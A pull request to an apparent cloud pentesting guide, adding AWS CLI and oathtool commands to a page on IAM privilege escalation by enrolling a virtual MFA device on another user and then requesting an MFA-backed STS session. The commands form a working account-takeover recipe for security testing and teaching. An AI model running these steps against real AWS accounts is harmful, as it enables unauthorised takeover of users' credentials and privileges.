### PR TITLE
Fixed some IAM MFA device priv esc issues.

### DIFF
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md
@@ -57,15 +57,38 @@ aws iam delete-access-key --access-key-id <key_id>
 
 If you can create a new virtual MFA device and enable it on another user, you can effectively enroll your own MFA for that user and then request an MFA-backed session for their credentials.
 
+**Prerequisites:**
+
+You can use any tool you want for the TOTP codes - oathtool is easy and lightweight.
+
+```bash
+sudo apt install oathtool
+sudo dnf install oathtool
+sudo yum install oathtool
+```
+
 **Exploit:**
 
 ```bash
 # Create a virtual MFA device (this returns the serial and the base32 seed)
-aws iam create-virtual-mfa-device --virtual-mfa-device-name <mfa_name>
+aws iam create-virtual-mfa-device --virtual-mfa-device-name <name-the-device> \
+    --bootstrap-method Base32StringSeed --outfile /path/to/save/mfa-seed.txt
 
-# Generate 2 consecutive TOTP codes from the seed, then enable it for the user
-aws iam enable-mfa-device --user-name <target_user> --serial-number <serial> \
+# Generate 2 consecutive TOTP codes from the seed
+
+oathtool --base32 --totp "<Seed_Here>" -w 1
+
+# Enable the new device for the user
+aws iam enable-mfa-device --user-name <target_user> --serial-number <device-arn> \
   --authentication-code1 <code1> --authentication-code2 <code2>
+```
+
+**Authenticate:**
+
+Once you have a basic session as the target user, you can use the security token service to get an MFA-backed token.
+
+```bash
+aws sts get-session-token --serial-number <device-arn> --token-code <code>
 ```
 
 **Impact:** Direct privilege escalation by taking over a user's MFA enrollment (and then using their permissions).


### PR DESCRIPTION
Command for creating the virtual mfa device seemed to require the `--outfile` and `--bootstrap-method` flags as well, added those. Added tool example for quickly getting the TOTPs with `oauthtool`, and added some guidance for using sts to actually get the mfa backed session. 